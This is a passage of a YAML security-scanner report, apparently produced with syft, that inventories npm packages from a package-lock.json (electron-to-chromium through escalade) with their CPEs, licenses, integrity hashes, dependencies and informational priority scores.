- cpe: cpe:2.3:a:electron_to:electron-to-chromium:1.5.345:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:electron_to:electron_to_chromium:1.5.345:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:electron:electron-to-chromium:1.5.345:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:electron:electron_to_chromium:1.5.345:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/electron-to-chromium@1.5.345
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.345.tgz
integrity: sha512-F9JXQGiMrz6yVNPI2qOVPvB9HzjH5cGzhs8oJ6A28V5L/YnzN/0KsuiibqF+F1Fd9qxFzD1BUnYSd8JfULxTwg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d03ffa53b9f68b04
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: emoji-regex 10.6.0'
title: emoji-regex 10.6.0
description: 'Package discovered: emoji-regex 10.6.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 20a2cf9e55a512fb
name: emoji-regex
version: 10.6.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:emoji-regex:emoji-regex:10.6.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:emoji-regex:emoji_regex:10.6.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:emoji_regex:emoji-regex:10.6.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:emoji_regex:emoji_regex:10.6.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:emoji:emoji-regex:10.6.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:emoji:emoji_regex:10.6.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/emoji-regex@10.6.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/emoji-regex/-/emoji-regex-10.6.0.tgz
integrity: sha512-toUI84YS5YmxW219erniWD0CIVOo46xGKColeNQRgOzDorgBi1v4D71/OFzgD9GO2UGKIv1C3Sp8DAn0+j5w7A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 40ac25fe3302f6ab
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: emoji-regex 8.0.0'
title: emoji-regex 8.0.0
description: 'Package discovered: emoji-regex 8.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6d4a27855f2a5940
name: emoji-regex
version: 8.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:emoji-regex:emoji-regex:8.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:emoji-regex:emoji_regex:8.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:emoji_regex:emoji-regex:8.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:emoji_regex:emoji_regex:8.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:emoji:emoji-regex:8.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:emoji:emoji_regex:8.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/emoji-regex@8.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz
integrity: sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2e49a0ba02ec88d9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: emoji-regex 9.2.2'
title: emoji-regex 9.2.2
description: 'Package discovered: emoji-regex 9.2.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6d104925e5745212
name: emoji-regex
version: 9.2.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:emoji-regex:emoji-regex:9.2.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:emoji-regex:emoji_regex:9.2.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:emoji_regex:emoji-regex:9.2.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:emoji_regex:emoji_regex:9.2.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:emoji:emoji-regex:9.2.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:emoji:emoji_regex:9.2.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/emoji-regex@9.2.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz
integrity: sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: dd09559c2dcfbb7e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: encodeurl 2.0.0'
title: encodeurl 2.0.0
description: 'Package discovered: encodeurl 2.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c88c25f6c6e59773
name: encodeurl
version: 2.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:encodeurl:encodeurl:2.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/encodeurl@2.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/encodeurl/-/encodeurl-2.0.0.tgz
integrity: sha512-Q0n9HRi4m6JuGIV1eFlmvJB7ZEVxu93IrMyiMsGC0lrMJMWzRgx6WGquyfQgZVb31vhGgXnfmPNNXmxnOkRBrg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: aefcf9a0415c9a67
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: end-of-stream 1.4.5'
title: end-of-stream 1.4.5
description: 'Package discovered: end-of-stream 1.4.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2e1781643534e89c
name: end-of-stream
version: 1.4.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:end-of-stream:end-of-stream:1.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:end-of-stream:end_of_stream:1.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:end_of_stream:end-of-stream:1.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:end_of_stream:end_of_stream:1.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:end-of:end-of-stream:1.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:end-of:end_of_stream:1.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:end_of:end-of-stream:1.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:end_of:end_of_stream:1.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:end:end-of-stream:1.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:end:end_of_stream:1.4.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/end-of-stream@1.4.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz
integrity: sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==
dependencies:
once: ^1.4.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8a726054b0a99ad6
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: engine.io 6.6.7'
title: engine.io 6.6.7
description: 'Package discovered: engine.io 6.6.7'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 560e37438ce30be1
name: engine.io
version: 6.6.7
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:socket:engine.io:6.6.7:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/engine.io@6.6.7
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/engine.io/-/engine.io-6.6.7.tgz
integrity: sha512-DgOngfDKM2EviOH3Mr9m7ks1q8roetLy/IMmYthAYzbpInMbYc/GS+fWFA3rl1gvwKVsQrVV61fo5emD1y3OJQ==
dependencies:
'@types/cors': ^2.8.12
'@types/node': '>=10.0.0'
'@types/ws': ^8.5.12
accepts: ~1.3.4
base64id: 2.0.0
cookie: ~0.7.2
cors: ~2.8.5
debug: ~4.4.1
engine.io-parser: ~5.2.1
ws: ~8.18.3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 765ac1332452cd05
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: engine.io-client 6.6.4'
title: engine.io-client 6.6.4
description: 'Package discovered: engine.io-client 6.6.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 930ef4784cebfb4a
name: engine.io-client
version: 6.6.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:socket:engine.io-client:6.6.4:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/engine.io-client@6.6.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/engine.io-client/-/engine.io-client-6.6.4.tgz
integrity: sha512-+kjUJnZGwzewFDw951CDWcwj35vMNf2fcj7xQWOctq1F2i1jkDdVvdFG9kM/BEChymCH36KgjnW0NsL58JYRxw==
dependencies:
'@socket.io/component-emitter': ~3.1.0
debug: ~4.4.1
engine.io-parser: ~5.2.1
ws: ~8.18.3
xmlhttprequest-ssl: ~2.1.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b2a7fb31422c2427
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: engine.io-parser 5.2.3'
title: engine.io-parser 5.2.3
description: 'Package discovered: engine.io-parser 5.2.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b307d9bc2f957b2d
name: engine.io-parser
version: 5.2.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:engine.io-parser:engine.io-parser:5.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:engine.io-parser:engine.io_parser:5.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:engine.io_parser:engine.io-parser:5.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:engine.io_parser:engine.io_parser:5.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:engine.io:engine.io-parser:5.2.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:engine.io:engine.io_parser:5.2.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/engine.io-parser@5.2.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/engine.io-parser/-/engine.io-parser-5.2.3.tgz
integrity: sha512-HqD3yTBfnBxIrbnM1DoD6Pcq8NECnh8d4As1Qgh0z5Gg3jRRIqijury0CL3ghu/edArpUYiYqQiDUQBIs4np3Q==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6de5b5b314bb1d48
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: entities 4.5.0'
title: entities 4.5.0
description: 'Package discovered: entities 4.5.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3c365deec0186b44
name: entities
version: 4.5.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-2-Clause
spdxExpression: BSD-2-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:entities:entities:4.5.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/entities@4.5.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/entities/-/entities-4.5.0.tgz
integrity: sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9ebfe3f940205a55
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: es-define-property 1.0.1'
title: es-define-property 1.0.1
description: 'Package discovered: es-define-property 1.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 198a07fe3b41a7bb
name: es-define-property
version: 1.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:es-define-property:es-define-property:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es-define-property:es_define_property:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es_define_property:es-define-property:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es_define_property:es_define_property:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es-define:es-define-property:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es-define:es_define_property:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es_define:es-define-property:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es_define:es_define_property:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es:es-define-property:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es:es_define_property:1.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/es-define-property@1.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz
integrity: sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ce987dda52f0c354
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: es-errors 1.3.0'
title: es-errors 1.3.0
description: 'Package discovered: es-errors 1.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 524e10cb2d7467ea
name: es-errors
version: 1.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:es-errors:es-errors:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es-errors:es_errors:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es_errors:es-errors:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es_errors:es_errors:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es:es-errors:1.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es:es_errors:1.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/es-errors@1.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz
integrity: sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8e3c7c80273d6fd7
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: es-object-atoms 1.1.1'
title: es-object-atoms 1.1.1
description: 'Package discovered: es-object-atoms 1.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: fa7ef7424a021d69
name: es-object-atoms
version: 1.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:es-object-atoms:es-object-atoms:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es-object-atoms:es_object_atoms:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es_object_atoms:es-object-atoms:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es_object_atoms:es_object_atoms:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es-object:es-object-atoms:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es-object:es_object_atoms:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es_object:es-object-atoms:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es_object:es_object_atoms:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es:es-object-atoms:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es:es_object_atoms:1.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/es-object-atoms@1.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz
integrity: sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==
dependencies:
es-errors: ^1.3.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: cdf746578205af98
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: es-set-tostringtag 2.1.0'
title: es-set-tostringtag 2.1.0
description: 'Package discovered: es-set-tostringtag 2.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 8f498e19379b53ea
name: es-set-tostringtag
version: 2.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:es-set-tostringtag:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es-set-tostringtag:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es_set_tostringtag:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es_set_tostringtag:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es-set:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es-set:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es_set:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es_set:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:es:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/es-set-tostringtag@2.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz
integrity: sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==
dependencies:
es-errors: ^1.3.0
get-intrinsic: ^1.2.6
has-tostringtag: ^1.0.2
hasown: ^2.0.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 3d860225864c56d0
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: escalade 3.2.0'
title: escalade 3.2.0
description: 'Package discovered: escalade 3.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2a58ccd5fc44a7b2
name: escalade
version: 3.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:escalade:escalade:3.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/escalade@3.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz
integrity: sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
